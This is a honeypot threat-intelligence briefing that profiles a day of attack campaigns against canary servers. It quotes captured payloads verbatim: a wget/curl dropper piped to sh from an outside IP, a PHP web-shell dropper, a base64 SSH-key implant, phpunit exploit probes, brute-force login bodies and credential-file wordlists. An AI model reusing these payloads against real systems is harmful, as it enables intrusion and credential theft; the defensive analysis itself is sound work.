FLUX FLEET — INTEL BRIEFING №11

Period: 2026-09-05 07:31 – 2026-09-06 07:31 UTC (24h digest window, day 10 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 10-day baseline, every result-tag spike attributed by spot query)

The digest window starts at the previous digest run time, and the +4 h timestamp cast widens the effective query window to ~03:31 UTC on 09-05. Events from 03:31 to 07:31 UTC on 09-05 appear in both this digest and №10's data. The new data starts at 07:31 UTC on 09-05. All times are UTC and quoted from the raw log timestamps.

BLUF

CRUSADER-SWEEP returned within minutes of №10's first run and ran at 90× scale for the rest of the window: 444 worker IPs, 67,725 events on ai-devbox-1, and a wordlist that grew from 19 paths to ~1,704 — now carrying the git-mirror exfiltration template under 10 web-root prefixes. That run alone explains aidev's +1,368% volume spike. METADATA-HUNT logged a fifth consecutive GCP day (136.85.12.249 on farm, 104.196.118.131 on aidev) and minted 33 canaries, but no credential reached AWS this window — 104.196.118.131 now holds 25 unused canaries, the fleet's second-largest hoard. NIGHTAGENT returned for a third consecutive day on a third residential IP (160.177.242.255), same GitHub dropper, but all 12 of its mint attempts failed upstream. WP-LOGIN-BRUTE stopped bursting and went continuous: 363 distinct credential pairs from 202 IPs across the full 24 hours. No fleet-side changes this cycle.

Key Judgements

  1. CRUSADER-SWEEP is a standing campaign that iterates same-day, not a one-off sweep. №10's first run ended 07:30 UTC on 09-05; the second run began 07:32 UTC. The worker pool grew 114 → 444 IPs, the wordlist 19 → ~1,704 paths, and the runtime stretched to 23 hours (last event at the digest horizon). The 19-path core list survived intact; the operator appended a ~1,600-path .git-internals walk (HEAD, config, refs named prod/qa/staging/dev/release, COMMIT_EDITMSG, hook samples) under 10 web-root prefixes (/var/www/, /html/, /htdocs/, /backend/, /www/, /public/, /wordpress/, /src/, /app/, /site/). (High confidence — 444 worker IPs share the UA, the core wordlist, and the timing; 167 workers ran only the 12-path /.git/config probe set; a stale Firefox/78 UA variant joined the original crusader-worker/1.0)
  2. The git-mirror exfiltration template is now mass-distributed. MEVSPACE-GITWALK ran it (days 7–8), a Hetzner IPv6 operator ran it (№10), and the crusader wordlist now carries it to 444 disposable IPs. No single actor matters anymore; the template itself is the commodity. (High confidence — path-by-path match of the environment-named ref walk against the registry's MEVSPACE-GITWALK signature; the crusader variant only adds web-root prefixes)
  3. METADATA-HUNT minted 33 credentials this window and used none of them in AWS. This is the first silent window since the campaign began on day 7. The day-9 runner used its canaries in Bedrock about a day after minting, so the operator is building inventory, not leaving — and 104.196.118.131's 25-canary single-day haul is now the fleet's largest one-collector take after OMEGA-SWEEP's 71. (Moderate confidence on the hold-vs-depart judgement — five consecutive GCP days and the widest UA set yet (~430 distinct forged crawler UAs, now including Slackbot, LinkedInBot, Discordbot, WhatsApp, Applebot, Google-Extended) argue the operator stays; the zero-use window is the only contrary signal)
  4. WP-LOGIN-BRUTE shifted from burst to continuous background brute-forcing. 363 distinct pairs in 363 credential POSTs (every body unique), 202 source IPs, spread over all 24 hours at 18–66 farm events per hour. The wordlist keeps folding node identities into passwords: ssoadmin, adminsso, ssosso, admin%40sso.com on farm; inference1, inference2025, inference%40%23, inference123%40 on aidev. (High confidence — 363 verbatim bodies counted; hourly histogram shows no gap; 41 credential POSTs from IPv6 sources)

Active Campaigns (day 10 status)

⟳ CRUSADER-SWEEP (serverless credential + git-mirror sweep) — hostile, second run, 90× scale

  • Actors: 444 worker IPs in this window: ~440 GCP (34.x/35.x/136.x) and Oracle Cloud (8.x) on aidev, plus 3 on control-1. Two UA variants: crusader-worker/1.0 (442 full-list workers) and a stale Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 (2 workers, 34.128.77.76 and 34.186.131.126). Window: 07:32 UTC on 09-05 through the digest horizon (07:31 UTC on 09-06) — the run was still active at window close.
  • TTPs: All GETs, zero POSTs. Four worker classes: 225 workers ran the 19-path core list once (/.env variants, /actuator/env, /actuator/configprops, /_ignition/health-check, /storage/logs/laravel.log, /wp-config.php.*, /crusader-404-probe); 167 workers ran only a 12-path /.git/config probe under the 10 web-root prefixes; 8 workers ran the list twice (38 events); 35 workers ran the full ~1,704-path list (1,740 events each). The one control-1 full-lister (35.243.183.166, 1,740 events at 09:27 UTC on 09-05) confirms the pool targets the whole fleet even though 99% of the mass hit aidev. 65,911 of the aidev requests carried the Contabo rDNS Host vmi3177282.contaboserver.net — the pool resolves rDNS, not the TLS identity. 14 workers minted one canary each (13 of them in a coordinated 06:00–06:02 UTC wave on 09-06); 229 workers drew upstream 400s.
  • Assessment: The same operator returned hours after №10, bulking the wordlist with the git-mirror template and adding a second UA. The 12-path .git/config-only worker class is new — a cheap second-stage probe that scales the mirror check without the full list. The coordinated 06:00 UTC mint wave minutes before the digest horizon shows a scheduler, not a spray. Watch for a third run; farm has not yet seen the mass list.

⟳ METADATA-HUNT (GCP-BE/US, forged AI-crawler UAs) — hostile, fifth consecutive GCP day, zero AWS use this window

  • Actors: 136.85.12.249 (Google LLC, SG) on canary-farm-1: 803 events, 578 paths, 12 POSTs, 8 mints, 17 × 400, at 09:28 UTC on 09-05. 104.196.118.131 (Google LLC, US) on ai-devbox-1: 803 events, 578 paths, 12 POSTs, 25 mints, zero 400s, at 03:25 UTC on 09-06. Five consecutive GCP days: 130.211.73.106, 207.175.90.192 + 34.38.121.96, 34.23.228.150 + 34.79.70.110, this pair.
  • TTPs: Same Vite/IMDS template (/__aws_leak_probe_*__, /@fs/proc/self/environ, /@fs/home/ec2-user/.aws/credentials, /.azure/credentials, /.mcp.json). The UA rotation widened again: ~430 distinct forged crawler UAs per IP, adding Slackbot-LinkExpanding, LinkedInBot, Discordbot, WhatsApp, Applebot, Google-Extended, facebookexternalhit, and Bytespider to the day-9 set.
  • Assessment: The aidev runner minted 25 credentials in 13 seconds with zero upstream rejections — the largest single-collector take in fleet history after OMEGA-SWEEP. No Tracebit alert fired during the window, so none of the 33 reached AWS. The aws-credentials-file (41 events) and firebase-json (21) result spikes trace to this pair. Watch Tracebit for the first use; the use IP, compared against day 9's, shows whether the credentials stay in one hand.

⟳ NIGHTAGENT (residential MA) — hostile, third consecutive day, third IP

  • Actors: 160.177.242.255, a new residential IP (previous: 196.206.35.222, 41.142.109.20). 618 events across both EU nodes (farm 303, aidev 315) spread 06:19–07:17 UTC on 09-06, 12 POSTs per node.
  • TTPs: The four-step loop, bodies verbatim from №9/№10: phpunit verify <?php echo "NightAgent";?> to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, dropper <?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>, form login user=root&pass=wrong, wp-batch multiplex — this run nested the multiplex ({"requests": [{"method": "POST", "path": "///"}, {"method": "POST", "path": "/wp/v2/posts", "body": {"requests": [...]}). New paths: the ownCloud phpunit shim /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php and the config.js-variant enumeration. All 12 /.env mint attempts returned upstream 400s — the first NightAgent run to mint nothing.
  • Assessment: Three days, three IPs, one unrotated GHSAT token. The kit is the actor; the IPs are disposable. CVE-2017-9841 against a non-existent phpunit install: no execution, and now no canaries either.

⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, continuous

  • Actors: 202 IPs (167 on farm, 69 on aidev, overlapping set; 41 credential POSTs from IPv6 sources). Identical forged Chrome/151.0.0.0 Windows UA on the bulk of sources.
  • TTPs: One GET /wp-login.php probe, then 1–3 credential POSTs per IP, but now with no quiet hour across the whole window. 363 distinct pairs in 363 POSTs. Verbatim samples: _wpnonce=7947478638&log=webmaster&pwd=ssoadmin&redirect_to=%2Fwp-admin%2F&rememberme=forever&testcookie=1&wp-submit=Log+In, _wpnonce=1c87e85c14&log=admin&pwd=ssoadmin&..., _wpnonce=329a590b98&log=editor&pwd=adminsso&..., _wpnonce=d85e981f22&log=editor&pwd=ssosso&...; on aidev _wpnonce=e07088145e&log=admin&pwd=inference%40%23&..., _wpnonce=0f4c380e55&log=admin&pwd=inference1&..., _wpnonce=78a82b3ae&log=admin&pwd=inference123%40&....
  • Assessment: The wordlist grew from 74 to 363 pairs in one day, and the operator now delivers a continuous trickle instead of one burst per IP — a standing credential-guessing service against both TLS identities. No mints; the farm wp-login-probe (676) and wp-login-credentials (336) spikes are entirely this campaign.

⟳ RCE-SWARM / libredtail kit — hostile, fleet-wide, re-accelerated

  • Actors: Six IPs this window, all in the 09:12–09:43 and 12:22–13:57 and 17:06–20:56 UTC bands on 09-05: 85.239.149.72, 63.249.65.106, 103.159.51.70, 107.150.97.10 (49 events each on farm), 38.76.198.103 (13, farm), 31.132.90.3 (3, control). Cloud-hosted IPs, same profile as days 1–9.
  • TTPs: Unchanged kit: libredtail-http UA, phpunit eval-stdin.php, PHP-CGI /bin/sh traversal. Both payload families appeared verbatim: the SSH-key drop <?php shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcCB8fCBjZCAvZGV2L3NobTsgZWNobyAnLS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K... and the dropper (wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s apache — on control with the self-rep flag variant sh -s apache.selfrep.
  • Assessment: Volume tripled from №10's three IPs. Zero executions fleet-wide; the payload host 217.60.195.113 shows zero callbacks after 10 days. The self-rep variant on control is the new detail — the kit tries to distinguish a fresh infection base.

⟳ INFOCREST-KIT shape (adminer/phpMyAdmin census) — hostile, returned under a new IP

  • Actors: 185.141.119.179 (HostRoyale Technologies, US) on both EU nodes: 755 events (farm 373, aidev 382), 33 POSTs per node, 4 mints, spread 10:15–11:45 UTC on 09-05.
  • TTPs: Tarpit cycling with python-requests/2.32.5 interleaved with rotating browser UAs; phpMyAdmin spelling census (/phpmyadmin/, /phpMyAdmin/, /PMA/, /pma/, /mysql-admin/, /php-my-admin/); adminer POSTs to /adminer.php, /adminer/adminer.php, /admin/adminer.php, body head verbatim auth%5Bdriver%5D=server&auth%5Bserver%5D=&auth%5Busername%5D=prod_rw&auth%5Bpass...; whm/cpanelid probes; wp-batch multiplex.
  • Assessment: The kit that ran as 23.165.56.117 (days 7–8, absent №10) returned one day later under a different IP and ASN. The prod_rw adminer body is the continuity fingerprint. The template is commodity; the operator identity is not.

⟳ REGISTRY-HUNT (LeakIX) — borderline, wave intact

  • Actors: 8 l9scan IPs in the evening wave (20:23–20:42 UTC on 09-05): 164.92.107.174, 143.244.168.161, 167.99.210.137, 167.71.175.236 on farm; 206.81.24.74, 209.97.180.8, 139.59.136.184, 167.99.182.39 on aidev. DigitalOcean rotating IPs.
  • TTPs: Fixed 27-step WebLogic → Confluence → WHM → Docker-registry journey, unchanged. 328 events total, 1 mint per IP (6 mints), zero POSTs beyond the journey steps.
  • Assessment: Ninth consecutive day. Scale steady at 8 IPs. Report the activity; the 6 fresh mints make LeakIX a collector, not just a researcher.

⚠ ORACLE-SWEEP (.env/phpinfo census, one IP per node) — hostile, NEW, landed in the overlap band

  • Actors: 213.35.109.13 (control-1, 04:44 UTC on 09-05), 161.118.247.96 (farm, 05:20), 161.118.213.214 (aidev, 05:56) — all Oracle Corporation, SG. 128 events, 117 distinct paths each, each run lasting 4–8 seconds.
  • TTPs: Forged Chrome/126.0.0.0 Windows UA. Journey: tarpit entry → .env-variant walk → .DS_Store.git/config and .git/HEADphpinfo.phprobots.txt/sitemap.xml → admin/webapp profile. One mint each.
  • Assessment: First analyzed here; the events sit in the 03:31–07:31 overlap band, so №10's mint table already carried the farm/aidev pair. One node per IP, one IP per node, identical 117-path list — a three-node census by one operator. The control-1 appearance completes the fleet sweep.

⟳ OMEGA-SWEEP (Omegatech /24) — hostile, dormant census, pool probing continues

  • Actors: Twelve 94.154.43.x IPs, one event each, spread across all 3 nodes: ten / tarpit handshakes, one /.env (94.154.43.43, drew a 400), and one SOHO-router credential probe (94.154.43.38, /boaform/admin/formLogin on aidev and control).
  • TTPs: Single-GET availability probes with honest stale-browser UAs — pool checks, not censuses.
  • Assessment: The .43.x pool now numbers 15 known IPs across three probes days. The flagship hoard is unchanged: 94.154.46.243 holds 71 unused canaries, now 5 days old, zero AWS use. No new .46.x census ran.

⟳ CREDSWEEP family (.env-variant census) — hostile, four operators this window

  • Actors: 213.209.159.154 (Feo Prest SRL /24, DE) returned after a 5-day gap: 171 events on control (11:08 UTC on 09-05) + 169 on farm (05:52 on 09-06), .env-variant census under 168–170 distinct prefixes each, stale Opera UAs, 1 mint. 45.148.10.238 returned after two absent windows and moved to aidev: 506 events, 179 paths (405 of them .env variants like /supabase/.env, /.env.sendgrid, /sites/all/libraries/mailchimp/.env), 10 rotating UAs including a typo-forged Mozlila/5.0 ... Bulid/NRD90M ... Moblie Safari, 2 mints. 91.245.74.31 escalated from 4-event collector to a 521-event, 511-path .env census on aidev (09:48 UTC on 09-05 to 04:04 on 09-06), 2 mints. Two one-off minters: 77.83.39.144 (farm, 143 events in 4.4 seconds, stale Chrome/39, 1 mint) and 74.0.42.13 (farm, UCBrowser UA with python-requests/2.32.3 POSTs, 1 mint).
  • TTPs: Exhaustive .env-variant and credential-file walks, one mint path each.
  • Assessment: The census template keeps recruiting new operators — four in one window, two of them returning known actors. 45.148.10.238's move from control-only to aidev plus its 10-UA rotation shows an operator that adapts per node.

Standing actors (persistence check)

  • 91.245.74.31 (PC Astra-net, UA) — third consecutive day; it escalated from a single-GET collector to a 521-event aidev census. All-time 6 mints. Volume trend: up sharply.
  • 45.148.10.238 — returned after two absent windows; moved from control-only to aidev, added UA rotation. 3 all-time mints.
  • 80.94.95.211 (SS-Net, RO) — returned on aidev (164 events, MSIE 9 UA, 13:01 UTC on 09-05) after farm-only runs; farm 8 events. 7 all-time mints. The SS-Net sibling 80.94.93.9 logged one control event.
  • 89.42.231.200 (Go-http-client) — new 3-node prober: OpenWrt diagnostic path /cgi-bin/luci/;stok=/locale on all 3 nodes across two days. IoT-router botnet check shape; shallow, no mints. Benign-shape, watch.
  • 16.5.0.236 (Hello World UA) — SOHO-router credential probes continue on all 3 nodes (44 events), unchanged.
  • 80.82.77.202 / 93.174.93.12 — the fixed-cadence /-handshake pair, unchanged.
  • Absent this window: 194.180.49.37 (MEVSPACE) after its №10 record run; 91.92.241.215 (audit-site) after three consecutive days; 176.65.148.226 and the other recurring small minters; 195.178.110.132 (Techoff); the Hetzner IPv6 git walker.

Benign / research (not hostile)

  • 196.251.122.4 / 65.2.142.242 (ArgusScanner/0.1; +http://example/abuse) — new self-identifying scanner, 12-path probe sets on aidev and control. The aidev visit minted 1. Borderline: report, do not treat as hostile.
  • 103.203.56.1 / 103.203.56.2 (HTTP Banner Detection (https://security.ipip.net)) — 1 event per node, /-only.
  • 162.243.83.227 — HTTP method fingerprint sweep (GET/POST/PUT/PATCH/DELETE/TRACE/OPTIONS/HEAD on /, /robots.txt, /sitemap.xml, /xmlrpc.php, /favicon.ico, a random /GN5eVkj2vU8P3xRG/ path, and a 100-character aaaa… path) on aidev and control, 51 events each, bare Mozilla/5.0 UA. No credential paths, no mints.
  • 94.154.43.38 — single SOHO-router probe, covered under OMEGA-SWEEP.
  • Censys / Palo Alto / zgrab / OAI-SearchBot / Odin / ivre-masscan — no hostile journeys this window.

Canary credentials

Summary

No canary credentials were used in AWS during the window. Fleet sensors minted 67 credentials to 31 collector IPs; none reached AWS.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 67
Distinct collector IPs 31
Credentials used in AWS (alerts) 0
Credentials stolen, no observed AWS use in window 67

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
104.196.118.131 ai-devbox-1 25 0 0 25 mints since 2026-09-06 03:25
136.85.12.249 canary-farm-1 8 0 0 8 mints since 2026-09-05 09:28
185.141.119.179 ai-devbox-1 2 0 0 4 mints since 2026-09-05 10:17
185.141.119.179 canary-farm-1 2 0 0 4 mints since 2026-09-05 10:17
45.148.10.238 ai-devbox-1 2 0 0 3 mints since 2026-09-03 13:30
91.245.74.31 ai-devbox-1 2 0 0 6 mints since 2026-09-04 10:52
139.59.136.184 ai-devbox-1 1 0 0 3 mints since 2026-08-31 20:31
143.244.168.161 canary-farm-1 1 0 0 2 mints since 2026-08-30 20:58
164.92.107.174 canary-farm-1 1 0 0 3 mints since 2026-09-03 20:39
167.71.175.236 canary-farm-1 1 0 0 4 mints since 2026-08-31 20:36
167.99.182.39 ai-devbox-1 1 0 0 4 mints since 2026-09-01 20:50
167.99.210.137 canary-farm-1 1 0 0 1 mints since 2026-09-05 20:38
196.251.122.4 ai-devbox-1 1 0 0 1 mints since 2026-09-05 22:33
206.81.24.74 ai-devbox-1 1 0 0 1 mints since 2026-09-05 20:25
209.97.180.8 ai-devbox-1 1 0 0 1 mints since 2026-09-05 20:42
213.209.159.154 canary-farm-1 1 0 0 3 mints since 2026-09-01 09:55
34.10.61.42 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
34.101.166.98 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:01
34.104.142.132 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
34.106.42.92 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
34.118.141.217 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
34.148.233.170 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
34.73.17.80 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:02
34.80.123.196 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
34.81.32.57 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:02
34.95.189.182 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
35.225.85.109 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:02
74.0.42.13 canary-farm-1 1 0 0 1 mints since 2026-09-05 22:45
77.83.39.144 canary-farm-1 1 0 0 1 mints since 2026-09-06 00:38
8.228.246.53 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:00
8.228.58.236 ai-devbox-1 1 0 0 1 mints since 2026-09-06 06:02
8.234.223.215 ai-devbox-1 1 0 0 1 mints since 2026-09-05 07:41

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • 94.154.46.243: 71 mints, 2026-09-01 12:13 → 2026-09-04 03:42
  • 104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25
  • 194.180.49.37: 21 mints, 2026-08-30 09:09 → 2026-09-04 17:18
  • 207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:50
  • 34.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:30
  • 34.74.98.8: 13 mints, 2026-09-01 09:19 → 2026-09-01 09:19
  • 35.247.178.64: 13 mints, 2026-08-30 11:55 → 2026-08-30 11:55
  • 196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:26
  • 94.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:42
  • 94.154.46.249: 12 mints, 2026-09-02 13:07 → 2026-09-02 13:08
  • 34.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:35
  • 87.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-04 05:06
  • 93.152.223.194: 11 mints, 2026-08-31 10:10 → 2026-08-31 20:34
  • 94.154.46.248: 10 mints, 2026-09-02 12:43 → 2026-09-02 12:43
  • 136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28
  • 80.94.95.211: 7 mints, 2026-08-30 21:31 → 2026-09-04 11:07
  • 196.77.107.174: 6 mints, 2026-08-31 22:55 → 2026-08-31 23:24
  • 23.165.56.117: 6 mints, 2026-09-02 22:58 → 2026-09-03 05:15
  • 41.142.109.20: 6 mints, 2026-09-05 05:09 → 2026-09-05 05:47
  • 72.167.41.202: 6 mints, 2026-09-04 18:22 → 2026-09-04 18:22
  • 91.245.74.31: 6 mints, 2026-09-04 10:52 → 2026-09-05 17:38
  • 94.154.46.247: 6 mints, 2026-09-03 17:01 → 2026-09-03 17:01
  • 167.71.175.236: 4 mints, 2026-08-31 20:36 → 2026-09-05 20:38
  • 167.99.182.39: 4 mints, 2026-09-01 20:50 → 2026-09-05 20:41
  • 182.8.227.195: 4 mints, 2026-08-31 20:48 → 2026-09-04 21:18
  • 185.141.119.179: 4 mints, 2026-09-05 10:17 → 2026-09-05 10:26
  • 81.172.241.94: 4 mints, 2026-08-31 07:20 → 2026-08-31 08:11
  • 94.154.46.250: 4 mints, 2026-09-01 15:55 → 2026-09-01 15:56
  • 130.12.180.77: 3 mints, 2026-09-02 00:04 → 2026-09-02 00:07
  • 139.59.136.184: 3 mints, 2026-08-31 20:31 → 2026-09-05 20:41
  • 157.230.19.140: 3 mints, 2026-08-30 20:46 → 2026-09-02 15:13
  • 164.92.107.174: 3 mints, 2026-09-03 20:39 → 2026-09-05 20:23
  • 165.227.39.235: 3 mints, 2026-08-31 20:17 → 2026-09-02 19:34
  • 185.177.72.53: 3 mints, 2026-09-03 03:26 → 2026-09-03 03:26
  • 213.209.159.154: 3 mints, 2026-09-01 09:55 → 2026-09-06 05:52
  • 45.148.10.238: 3 mints, 2026-09-03 13:30 → 2026-09-05 20:43
  • 91.92.241.215: 3 mints, 2026-09-04 01:31 → 2026-09-04 08:15
  • 91.92.41.55: 3 mints, 2026-09-01 07:53 → 2026-09-02 14:41

Canary-use attribution (briefing prose)

No alert fired: not one of the window's 67 minted credentials reached AWS. The two METADATA-HUNT runners hold 33 of them (104.196.118.131: 25 on aidev; 136.85.12.249: 8 on farm), the crusader pool holds 14, and the CREDSWEEP operators hold most of the rest. The day-9 runner used its canaries in Bedrock about a day after minting, so treat these 67 as hostile inventory pending expiry, and treat 104.196.118.131's 25-canary haul as the hoard to watch. OMEGA-SWEEP's 94.154.46.243 still holds 71 canaries at 5 days with zero use.

Fleet Observations

  • Canary economics: Digest-window mints 87 (farm 21 / aidev 65 / control 1), all ["aws"]; the true new window (07:31 UTC+) holds 67 to 31 collectors — the difference is №10's tail in the 03:31–07:31 overlap band (41.142.109.20, the 161.118 Oracle pair, the first crusader run). All-time: 558 credentials to 189 collector IPs. Mint failures: 364 × 400, zero 401s. Attribution: 229 from crusader workers, 17 from 136.85.12.249, 12 from NightAgent's 160.177.242.255, the remainder from the census operators (45.148.10.238, 185.141.119.179, 91.245.74.31, 94.154.43.43, 213.209.159.154). Root cause unchanged: upstream rejection of rapid-retry request shapes, not key state.
  • XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — ninth consecutive clean day post-fix. 2,244 requests carried single-entry XFF.
  • TLS/attribution posture: The Contabo rDNS Host vmi3177282.contaboserver.net carried 68,541 aidev events this window (the crusader pool resolves rDNS), against 1,116 for inference.fapthropic.com. Farm: sso.rightabouteverything.show 1,847 events, 1,493 https. Control deliberately certless (1 https event). WP-LOGIN-BRUTE keeps guessing both TLS identities in password fields, so the attribution surface stays an attack surface on both EU nodes.
  • Volume: Digest window 78,583 events (farm 4,007 −37% / aidev 72,053 +1,368% / control 2,523 −69%). Aidev: crusader 67,725 (94%), GCP runner 803, NightAgent 618, 45.148.10.238 506. Farm: wp-login continuous ~834, GCP runner 803, NightAgent 303, INFOCREST 373. Control: crusader workers 1,771 (70%), Feo Prest 171, Oracle trio 128, method-sweep 51 — quietest control day since day 2. Every ≥50-event hour attributed: aidev 08:00–13:00 UTC on 09-05 (57,465 events) = crusader full-list workers; aidev 06:00 UTC on 09-06 (7,362) = the coordinated crusader mint wave plus the two Firefox/78 full-listers; control 09:00 UTC on 09-05 (1,741) = 35.243.183.166's full list; control 02:00 UTC on 09-06 (72) = the 162.243.83.227 method sweep.
  • Control discovery velocity: Day-10 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99. The fresh-IP curve holds its plateau near 100 unique IPs per day for a fourth day. The long-term differential dataset continues.
  • First-seen inventory (not a timeline): New paths resolve to the crusader .git-internals wordlist (the /public/.git/hooks/push-to-checkout.sample, /www/.git/logs/refs/stash family) and NightAgent's /owncloud/apps/graphapi/.../GetPhpInfo.php. New UAs: HTTP Banner Detection (https://security.ipip.net) (banner scanner, 1 event per node), ArgusScanner/0.1 (12-path probe sets), the stale Firefox/78 crusader variant, and 45.148.10.238's ten-string browser-rotation set including the Mozlila/5.0 typo forgery.
  • Digest quirks (all re-confirmed this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast (all spot queries re-filtered on the raw timestamp string to exclude the overlap band); single-writer DuckDB lock (all spot queries run sequentially); sync-arrival first-seen stamps; window overlap with №10 cross-checked before counting.
  • Infrastructure: no fleet-side changes this cycle.

Gaps / Next Collection

  1. Crusader third run — the second run was still firing at the digest horizon, and its 06:00 UTC mint wave ran on a scheduler. Check whether the wave repeats, whether the 12-path .git/config-only worker class (167 IPs) grows into its own campaign, and whether farm ever receives the mass list.
  2. 104.196.118.131's 25-canary hoard — the highest-value attribution question. Watch Tracebit for the first use; the use IP, compared against day 9's Bedrock use, tells us whether GCP-runner credentials stay in one operator's hands or move between them.
  3. NightAgent token rotation — the GHSAT token in the nightagents/nightshell dropper is unrotated across three runs and three source IPs. Re-check repo visibility and token validity; a dead token retires the search indicator.
  4. 91.245.74.31 escalation — from 4 events (day 8) to a 521-event census (day 10). If it walks a second node, promote it from standing actor to named campaign.
  5. WP-LOGIN-BRUTE as background noise — 363 pairs in 24 hours with no burst pattern. Set a per-window pair-count threshold so growth (74 → 363) triggers without manual comparison.
  6. ORACLE-SWEEP second run — one census, three nodes, one IP each. A second run with fresh 161.118.x/213.35.x IPs confirms a standing operator rather than a one-time fleet sweep.

Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-06.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (185.141.119.179, 160.177.242.255), plus 20 ad-hoc v_full queries (crusader worker census and wordlist families, GCP pair detail, NightAgent bodies, libredtail payload corpus, wp-login pair corpus, 400-failure attribution, Omegatech pool, Oracle trio, standing-actor and benign checks) and the Tracebit canary-section generator.